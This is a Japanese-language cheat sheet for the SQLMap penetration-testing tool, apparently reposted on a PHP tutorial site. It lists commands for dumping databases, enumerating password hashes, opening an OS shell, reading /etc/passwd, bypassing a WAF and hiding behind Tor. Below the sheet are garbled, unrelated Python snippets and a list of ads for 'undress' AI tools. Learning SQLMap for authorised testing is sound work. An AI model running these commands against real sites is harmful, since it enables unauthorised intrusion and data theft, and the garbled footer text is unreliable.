著者: Trix Cyrus
SQLMap とは何ですか?
SQLMap は、Web アプリケーションの SQL インジェクションの脆弱性を検出して悪用するために使用されるオープンソースの侵入テスト ツールです。 MySQL、PostgreSQL、Oracle、Microsoft SQL Server などのさまざまなデータベース システムをサポートしています。
基本的な使い方
SQLMap を開始するには、ターゲット URL:
を指定することで、最も単純な形式で SQLMap を実行できます。
sqlmap -u "http://example.com/index.php?id=1"
このコマンドは、SQL インジェクションの脆弱性についてターゲット URL をスキャンします。
1.脆弱性の検出
基本的な脆弱性スキャンを実行し、SQL インジェクション ポイントを自動的に検出するには、次のオプションを使用します:
sqlmap -u "http://example.com/index.php?id=1" --dbs
--dbs: 脆弱性が見つかった場合、ターゲット サーバー上で利用可能なすべてのデータベースをリストします。
2. POST リクエストの指定
POST リクエスト (通常はログインフォーム) を必要とするターゲットの場合、次のようにデータを指定できます:
sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234"
3. WAF とフィルターのバイパス
Web アプリケーション ファイアウォール (WAF) を回避するために、SQLMap にはペイロード難読化技術が含まれています。
sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment
--tamper: 改ざんスクリプトを使用してフィルターを回避します。例: space2comment、charencode.
4.データベース、テーブル、列の抽出
ターゲット システム上のデータベースのリストを取得するには:
sqlmap -u "http://example.com/index.php?id=1" --dbs
データベースが特定されたら、そのテーブルを抽出します。
sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables
特定のテーブルから列を取得するには:
sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --columns
5.データをダンプしています
テーブルの内容のダンプは、SQLMap の最も便利な機能の 1 つです。たとえば、特定のテーブルからすべてのデータをダンプするには:
sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump
6.データベース ユーザーとパスワードの列挙
SQLMap は、データベース ユーザーを列挙したり、ハッシュ化されたパスワードを解読したりするためにも使用できます。
sqlmap -u "http://example.com/index.php?id=1" --users sqlmap -u "http://example.com/index.php?id=1" --passwords
7.オペレーティング システムへのアクセス
場合によっては、特にデータベース ユーザーが高レベルの権限を持っている場合、SQLMap を使用してオペレーティング システム上でコマンドを実行できます。
sqlmap -u "http://example.com/index.php?id=1" --os-shell
これにより、ターゲット システム上でコマンドを実行できる対話型シェルが提供されます。
8.ファイルのアップロードと読み取り
ターゲット システムからファイルを読み取ったり、悪意のあるファイルをアップロードしたりすることもできます (許可されている場合)。
sqlmap -u "http://example.com/index.php?id=1" --file-read="/etc/passwd" sqlmap -u "http://example.com/index.php?id=1" --file-write="/path/to/file" --file-dest="/destination/path"
9.匿名性のために Tor を使用する
自分の身元を隠すには、Tor ネットワーク経由で SQLMap を実行できます。
sqlmap -u "http://example.com/index.php?id=1" --tor --tor-type=SOCKS5 --check-tor
--tor: Tor を有効にします。
--check-tor: 接続が Tor 経由で行われたかどうかを確認します。
10.セッションの保存と再開
SQLMap では、--session オプションを使用して進行状況を保存して再開できます。
sqlmap -u "http://example.com/index.php?id=1" --session=your_session_name
後で、次の方法で同じセッションを再開できます。
sqlmap -r your_session_name
11.詳細モード
SQLMap の動作に関する詳細情報を表示するには:
sqlmap -u "http://example.com/index.php?id=1" -v 3
-v オプションは冗長性を制御します (レベル 0 から 6、6 はすべての詳細を示します)。
- 複数のターゲットの自動スキャン
SQLMap は、ファイルに保存されている複数の URL のスキャンをサポートしています:
sqlmap -m urls.txt --batch
--batch: デフォルトのオプションを使用してすべてのプロンプトに自動的に応答します。これは自動スキャンに役立ちます。
スキャンを進めるには、--risk=3 と --level=5 も使用します
このチートシートを使用すると、読者に SQLMap の重要なコマンドを紹介し、SQL インジェクション テストを始めるのに役立ちます。
~TrixSec
以上がSQLMap チートシート: 自動 SQL インジェクションのクイックガイドの詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。
リストと配列の選択は、大規模なデータセットを扱うPythonアプリケーションの全体的なパフォーマンスにどのように影響しますか?May 03, 2025 am 12:11 AMforhandlinglaredataSetsinpython、usenumpyArrays forbetterperformance.1)numpyarraysarememory-effictientandfasterfornumericaloperations.2)nusinnnnedarytypeconversions.3)レバレッジベクトル化は、測定済みのマネージメーシェイメージーウェイズデイタイです
Pythonのリストと配列にメモリがどのように割り当てられるかを説明します。May 03, 2025 am 12:10 AMinpython、listsusedynamicmemoryallocation with allocation、whilenumpyArraysalocatefixedmemory.1)listsallocatemorememorythanneededededinitivative.2)numpyArrayasallocateexactmemoryforements、rededicablebutlessflexibilityを提供します。
Pythonアレイ内の要素のデータ型をどのように指定しますか?May 03, 2025 am 12:06 AMinpython、youcanspecthedatatypeyfelemeremodelernspant.1)usenpynernrump.1)usenpynerp.dloatp.ploatm64、フォーマーpreciscontrolatatypes。
Numpyとは何ですか、そしてなぜPythonの数値コンピューティングにとって重要なのですか?May 03, 2025 am 12:03 AMnumpyisessentialfornumericalcomputinginpythonduetoitsspeed、memory efficiency、andcomprehensivematicalfunctions.1)それは、performsoperations.2)numpyArraysaremoremory-efficientthanpythonlists.3)Itofderangeofmathematicaloperty
「隣接するメモリ割り当て」の概念と、配列にとってその重要性について説明します。May 03, 2025 am 12:01 AMcontiguousMemoryAllocationisucial forArraysは、ForeffienceAndfastelementAccess.1)iteenablesConstantTimeAccess、O(1)、DuetodirectAddresscalculation.2)itemprovesefficiencyByAllowingMultiblementFechesperCacheLine.3)itimplifieMememm
Pythonリストをどのようにスライスしますか?May 02, 2025 am 12:14 AMslicingapythonlistisdoneusingtheyntaxlist [start:stop:step] .hore'showitworks:1)startisthe indexofthefirstelementtoinclude.2)spotisthe indexofthefirmenttoeexclude.3)staptistheincrementbetbetinelements
Numpyアレイで実行できる一般的な操作は何ですか?May 02, 2025 am 12:09 AMnumpyallows forvariousoperationsonarrays:1)basicarithmeticlikeaddition、減算、乗算、および分割; 2)AdvancedperationssuchasmatrixMultiplication;
Pythonを使用したデータ分析では、配列はどのように使用されていますか?May 02, 2025 am 12:09 AMArraysinpython、特にnumpyandpandas、aresentialfordataanalysis、offeringspeedandeficiency.1)numpyarraysenable numpyarraysenable handling forlaredatasents andcomplexoperationslikemoverages.2)Pandasextendsnumpy'scapabivitieswithdataframesfortruc
ホットAIツール
Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ
AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。
Undress AI Tool
脱衣画像を無料で
Clothoff.io
AI衣類リムーバー
Video Face Swap
完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。
人気の記事
ホットツール
mPDF
mPDF は、UTF-8 でエンコードされた HTML から PDF ファイルを生成できる PHP ライブラリです。オリジナルの作者である Ian Back は、Web サイトから「オンザフライ」で PDF ファイルを出力し、さまざまな言語を処理するために mPDF を作成しました。 HTML2FPDF などのオリジナルのスクリプトよりも遅く、Unicode フォントを使用すると生成されるファイルが大きくなりますが、CSS スタイルなどをサポートし、多くの機能強化が施されています。 RTL (アラビア語とヘブライ語) や CJK (中国語、日本語、韓国語) を含むほぼすべての言語をサポートします。ネストされたブロックレベル要素 (P、DIV など) をサポートします。
ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境
SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)
SublimeText3 Linux 新バージョン
SublimeText3 Linux 最新バージョン
PhpStorm Mac バージョン
最新(2018.2.1)のプロフェッショナル向けPHP統合開発ツール
ホットトピック
7938
15165214141252130325125029